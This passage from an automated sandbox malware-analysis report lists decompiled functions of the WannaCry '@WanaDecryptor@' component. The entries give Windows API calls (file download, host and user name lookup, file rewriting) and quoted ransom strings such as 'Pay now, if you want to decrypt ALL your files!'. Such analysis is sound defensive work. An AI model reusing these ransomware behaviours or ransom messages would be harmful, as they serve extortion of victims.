    • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8A3
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
    • #825.MFC42(?,?,?,?), ref: 0040BDED
    • #825.MFC42(?), ref: 0040BE7A
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C776
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C794
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004038F0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
    APIs
      • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
      • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
      • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
      • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
      • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
      • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
    • sprintf.MSVCRT ref: 0040397A
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
      • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
      • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
      • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
    • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
      • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00403AF0: fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00403AF0: fclose.MSVCRT ref: 00403C62
    • CloseHandle.KERNEL32(?), ref: 004039F1
    Strings
    • %08X.dky, xrefs: 00403969
    • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
    • All your files have been decrypted!, xrefs: 004039C3
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00402560, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81
    APIs
    • wcscpy.MSVCRT ref: 0040257D
    • wcsrchr.MSVCRT ref: 0040258A
    • _wcsicmp.MSVCRT ref: 004025A5
    • _wcsicmp.MSVCRT ref: 004025B4
    • wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004020A0: GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
      • Part of subcall function 004020A0: SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402452
      • Part of subcall function 004020A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
      • Part of subcall function 004020A0: SetEndOfFile.KERNEL32(00000000), ref: 00402491
      • Part of subcall function 004020A0: SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402511
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404090, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
    APIs
    • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
    • #860.MFC42(00421798), ref: 004040F6
    • #858.MFC42(00000000,00421798), ref: 004040FE
    • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
    • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407CB0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
    APIs
      • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    • #2514.MFC42 ref: 00407CE5
    • #2414.MFC42 ref: 00407D1A
    • #2414.MFC42 ref: 00407D4F
    • #616.MFC42 ref: 00407D6E
    • #693.MFC42 ref: 00407D7F
    • #641.MFC42 ref: 00407D93
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040C240, Relevance: 13.7, APIs: 9, Instructions: 195
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
    • fopen.MSVCRT ref: 0040C46B
    • fwrite.MSVCRT ref: 0040C489
    • fclose.MSVCRT ref: 0040C48F
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004085C0, Relevance: 13.6, APIs: 9, Instructions: 75
    APIs
    • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
    • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
    • GetSysColor.USER32 ref: 0040861D
    • GetSysColor.USER32(00000009), ref: 00408624
    • GetSysColor.USER32(00000012), ref: 0040862B
    • GetSysColor.USER32(00000002), ref: 00408632
    • SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
    • GetSysColor.USER32(0000001B), ref: 0040865C
    • #6140.MFC42(00000002,000000FF), ref: 00408667
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401A90, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
    APIs
    • CreateProcessA.KERNEL32 ref: 00401AE3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
    • CloseHandle.KERNEL32(?), ref: 00401B31
    • CloseHandle.KERNEL32(?), ref: 00401B38
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401140, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
    APIs
    • #4710.MFC42 ref: 00401145
    • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
    • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
    • #537.MFC42(Connecting to server...), ref: 0040118D
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
    • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
    Strings
    • Connecting to server..., xrefs: 00401188
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040B3C0, Relevance: 12.2, APIs: 8, Instructions: 203
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040ADC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
      • Part of subcall function 0040ADC0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B0C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
      • Part of subcall function 0040B0C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407C30, Relevance: 12.0, APIs: 8, Instructions: 48
    APIs
    • OpenClipboard.USER32(?), ref: 00407C38
    • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
    • CloseClipboard.USER32 ref: 00407C5B
    • EmptyClipboard.USER32 ref: 00407C66
    • GlobalLock.KERNEL32(00000000), ref: 00407C79
    • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
    • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
    • CloseClipboard.USER32 ref: 00407CA1
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00402F10, Relevance: 10.6, APIs: 7, Instructions: 139
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407F80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
    APIs
    • fopen.MSVCRT ref: 00407FBD
    • fread.MSVCRT ref: 00407FDD
    • fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401220, Relevance: 10.6, APIs: 7, Instructions: 53
    APIs
    • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
    • KillTimer.USER32(?,000003E9), ref: 0040125E
    • #4853.MFC42 ref: 00401266
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
    • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
    • #2379.MFC42 ref: 004012C4
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00403860, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
    APIs
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
    • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
    • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
    Strings
    • Please select a host to decrypt., xrefs: 00403885
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004044C0, Relevance: 10.5, APIs: 7, Instructions: 38
    APIs
    • GetParent.USER32(?), ref: 004044D2
    • #2864.MFC42(00000000), ref: 004044D9
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
    • #2860.MFC42(00000000), ref: 004044EF
    • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
    • CreateFontIndirectA.GDI32(?), ref: 00404513
    • #1641.MFC42(00000000), ref: 0040451D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040A150, Relevance: 9.4, APIs: 6, Instructions: 375
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040C060, Relevance: 9.1, APIs: 6, Instructions: 138
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004049B0, Relevance: 9.1, APIs: 6, Instructions: 107
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
    • _local_unwind2.MSVCRT ref: 00404A85
    • _local_unwind2.MSVCRT ref: 00404AC7
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00409C20, Relevance: 9.1, APIs: 6, Instructions: 104
    APIs
    • #3797.MFC42 ref: 00409C27
    • #6734.MFC42(?,?), ref: 00409C4E
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
    • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
    • #4284.MFC42(00000000,00004000,00000000,?,?), ref: 00409CDD
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00409CF0
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004127E0, Relevance: 9.1, APIs: 6, Instructions: 103
    APIs
    • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
    • #823.MFC42(?,?,?), ref: 00412849
      • Part of subcall function 00411C00: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,?,?,00000000,0041289D), ref: 00411C27
      • Part of subcall function 00411C00: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00411C87
    • #825.MFC42(?), ref: 004128B5
    • #825.MFC42(?), ref: 004128CE
    • #825.MFC42(00000000), ref: 004128DD
    • #823.MFC42(00000008), ref: 004128FA
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040B780, Relevance: 9.1, APIs: 6, Instructions: 68
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000428), ref: 0040B793
    • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
    • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
    • DeleteFileA.KERNEL32(?), ref: 0040B815
    • DeleteFileA.KERNEL32(?), ref: 0040B82C
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00409A40, Relevance: 9.1, APIs: 6, Instructions: 65
    APIs
